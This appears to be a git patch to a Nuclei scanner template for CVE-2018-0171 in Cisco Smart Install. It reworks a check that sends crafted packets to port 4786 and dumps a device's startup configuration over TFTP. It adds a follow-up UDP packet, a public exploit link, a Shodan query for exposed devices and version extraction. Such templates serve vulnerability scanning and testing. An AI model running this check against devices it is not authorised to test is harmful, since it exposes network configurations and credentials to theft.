From fc9e4f85014f6c8a1fa9f5fc3bbd4cbdfe14f5c7 Mon Sep 17 00:00:00 2001
From: Matej Smycka <smycka@ics.muni.cz>
Date: Mon, 25 Aug 2025 20:04:09 +0200
Subject: [PATCH] feat: make CVE-2018-0171 stable and add additional info

---
 javascript/cves/2018/CVE-2018-0171.yaml | 25 +++++++++++++++++++------
 1 file changed, 19 insertions(+), 6 deletions(-)

diff --git a/javascript/cves/2018/CVE-2018-0171.yaml b/javascript/cves/2018/CVE-2018-0171.yaml
index 125f3912629..261815230d4 100644
--- a/javascript/cves/2018/CVE-2018-0171.yaml
+++ b/javascript/cves/2018/CVE-2018-0171.yaml
@@ -2,13 +2,15 @@ id: CVE-2018-0171
 
 info:
   name: Cisco Smart Install - Configuration Download
-  author: ritikchaddha
+  author: ritikchaddha, matejsmycka
   severity: critical
   description: |
-    Checks if TFTP service becomes available after Smart Install exploitation. This template should be run after the configuration extraction payload to verify that the device is now serving configuration files via TFTP.
+    A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. 
+    This script sends crafted packets to the Cisco Smart Install port (4786) and dumps the startup configuration via TFTP.
   reference:
     - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
     - https://nvd.nist.gov/vuln/detail/CVE-2018-0171
+    - https://github.com/AlrikRr/Cisco-Smart-Exploit
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -19,7 +21,7 @@ info:
     verified: true
     max-request: 2
     shodan-query: 'port:4786 "Smart Install"'
-  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev
+  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev,udp
 
 flow: tcp(1) && javascript(1)
 
@@ -52,7 +54,14 @@ javascript:
       let c = require("nuclei/net");
       let conn = c.Open('udp', `${Host}:${Port}`);
       conn.SendHex(packet.Hex());
-      let resp = conn.RecvString(4096);
+      let resp = conn.Recv(4096);
+
+      // Send malformed packet otherwise TFTP will not respond for around minute
+      let packet2 = bytes.NewBuffer();
+      let message2 = "\x00\x05error"
+      packet2.WriteString(message2);
+      conn.SendHex(packet2.Hex());
+           
       resp;
 
     args:
@@ -64,6 +73,10 @@ javascript:
         words:
           - 'boot-start-marker'
           - 'version'
-          - 'hostname'
+          - 'NVRAM'
         condition: and
-# digest: 4a0a004730450220524eb982d0bd03e5e5bd55cda3de7bf60f3b4177dca62eefb68ef0a395ebc8b0022100971bf57fafe0a25b7bf8cba6ff9f7fc6f283c2982a0340bf6f74952119b7d0ee:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+    extractors:
+      - type: regex
+        regex:
+          - "version\\s+(\\d+\\.\\d+)"